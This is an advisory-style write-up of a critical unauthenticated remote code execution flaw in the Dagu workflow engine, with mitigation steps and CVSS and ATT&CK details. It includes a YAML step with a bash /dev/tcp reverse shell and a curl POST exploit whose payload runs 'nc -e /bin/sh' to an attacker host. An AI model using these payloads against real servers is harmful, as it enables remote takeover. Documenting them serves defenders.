CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-6QR9-G2XW-CW92
9.84.50%

Dagu: The Friendly Ghost that Runs Your Malware (GHSA-6QR9-G2XW-CW92)

Alon Barad
Alon Barad
Software Engineer

Feb 20, 2026·4 min read·6 visits

PoC Available

Executive Summary (TL;DR)

Critical RCE in Dagu workflow engine. Default configuration exposes API endpoints without auth. Attackers can POST a YAML file to execute arbitrary shell commands.

Dagu, a lightweight Go-based workflow engine often used as a cron alternative, inadvertently provided 'RCE as a Service' in its default configuration. By failing to enforce authentication on API endpoints that accept inline DAG definitions, it allowed any unauthenticated attacker to execute arbitrary shell commands on the host server via simple HTTP requests.

The Hook: Cron for the Cloud Generation

Dagu is a nifty little tool. Written in Go, it bills itself as a developer-friendly cron replacement and workflow engine. It uses Directed Acyclic Graphs (DAGs) defined in YAML to manage dependencies and execute tasks. It's lightweight, self-contained, and comes with a shiny web UI. It's the kind of tool DevOps engineers love because it just works.

But here is the kicker: Dagu's entire purpose is to execute commands. That is its job. It takes a YAML file, reads the command field, and passes it to the operating system shell.

Now, imagine a tool designed to execute shell commands that, by default, listens on all interfaces (0.0.0.0) and requires no password. That isn't a vulnerability; that is a remote administration tool for attackers. GHSA-6QR9-G2XW-CW92 isn't a complex memory corruption bug; it's a feature working exactly as intended, but accessible to the wrong people.

The Flaw: Trust Issues

The vulnerability stems from a classic "secure by default" failure. In affected versions of Dagu, the configuration for authentication was often permissive or entirely disabled out-of-the-box.

The application exposes an API (typically on port 8080) to manage DAGs. Specifically, there is an endpoint—often /api/v1/dags or /api/v2/dags—designed to accept "inline" DAGs. This feature allows a user to POST a YAML definition directly to the server to be executed immediately, bypassing the need to write files to the disk first.

Because the API lacked mandatory authentication checks in the default configuration, Dagu would blindly accept any POST request containing a YAML blob. It didn't care who sent it. It didn't ask for a token. It just parsed the YAML, saw a command, and said, "You got it, boss!"

The Mechanism: It's Not a Bug, It's a Feature

Let's look at why this is so dangerous. In a typical RCE vulnerability (like Log4Shell or a deserialization flaw), we are tricking the application into doing something it wasn't supposed to do. We are corrupting memory or abusing gadget chains.

In Dagu's case, we are just asking it to do its job. The code path looks something like this (simplified logic):

  1. Receive Request: POST /api/v1/dags
  2. Parse Body: Unmarshal JSON/YAML into a DAG struct.
  3. Execute: Loop through steps and run exec.Command(step.Command).

There is no sanitization because the input is expected to be a shell command. The developer assumes that only trusted admins are submitting DAGs. The following YAML snippet is perfectly valid Dagu syntax, but it's also a death sentence for the server:

name: pwn_workflow
steps:
  - name: reverse_shell
    command: bash -c 'bash -i >& /dev/tcp/10.0.0.1/1337 0>&1'

When Dagu receives this, it doesn't see an exploit. It sees a valid workflow step named reverse_shell and dutifully executes the command.

The Exploit: One Request to Rule Them All

Exploiting this is trivially easy. You don't need Metasploit. You don't need a disassembler. You just need curl.

First, an attacker scans for port 8080. If they see the Dagu UI or a 404 from the API, they know they have a target. The exploitation involves sending a single HTTP request.

curl -X POST http://target-ip:8080/api/v1/dags \
  -H "Content-Type: application/yaml" \
  --data-binary $'name: malicious_dag\nsteps:\n  - name: exploit\n    command: "nc -e /bin/sh attacker-ip 4444"'

Or, if the API expects a start action:

# Submit and trigger in one go (depending on API version)
curl -X POST "http://target-ip:8080/api/v1/dags?start=true" ...

The moment that request lands, the Dagu process spawns a shell connecting back to the attacker. If Dagu is running inside a Docker container (common), the attacker now has a foothold in the container. If it's running as root on bare metal (uncommon but possible), it's game over immediately.

The Fix: Authentication is Not Optional

The remediation is straightforward: stop letting strangers talk to your workflow engine.

1. Enable Built-in Auth: The primary fix is to modify the config.yaml or environment variables to enforce authentication.

auth:
  mode: builtin # This was likely "none" or unset before
  username: admin
  password: "PleaseChangeMeToSomethingStrong"

2. Network Isolation: Why is your workflow engine exposed to the internet? Put it behind a VPN, a reverse proxy with Basic Auth, or bind it to localhost (127.0.0.1) if it's only needed locally.

3. Least Privilege: Ensure the user running the Dagu process has limited permissions. It shouldn't be running as root. If an attacker does get code execution, don't give them the keys to the castle.

Official Patches

DaguGitHub Security Advisory

Fix Analysis (1)

Technical Appendix

CVSS Score
9.8/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Probability
4.50%
Top 15% most exploited

Affected Systems

Dagu Workflow EngineGo-based DevOps tooling

Affected Versions Detail

Product
Affected Versions
Fixed Version
Dagu
dagu-org
< Feb 2026 PatchFeb 2026 Release
AttributeDetail
CWE IDCWE-306
Attack VectorNetwork
CVSS9.8 (Critical)
ImpactRemote Code Execution
Exploit StatusFunctional PoC
AuthenticationNone Required (Default)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.004Command and Scripting Interpreter: Unix Shell
Execution
CWE-306
Missing Authentication for Critical Function

The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

Known Exploits & Detection

GitHubAnalysis of the source code reveals the direct mapping of API input to execution functions.

Vulnerability Timeline

Vulnerability identified by researcher ByamB4
2026-02-05
GHSA-6QR9-G2XW-CW92 Published
2026-02-10
Patch released enforcing authentication
2026-02-10

References & Sources

  • [1]Dagu Repository

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.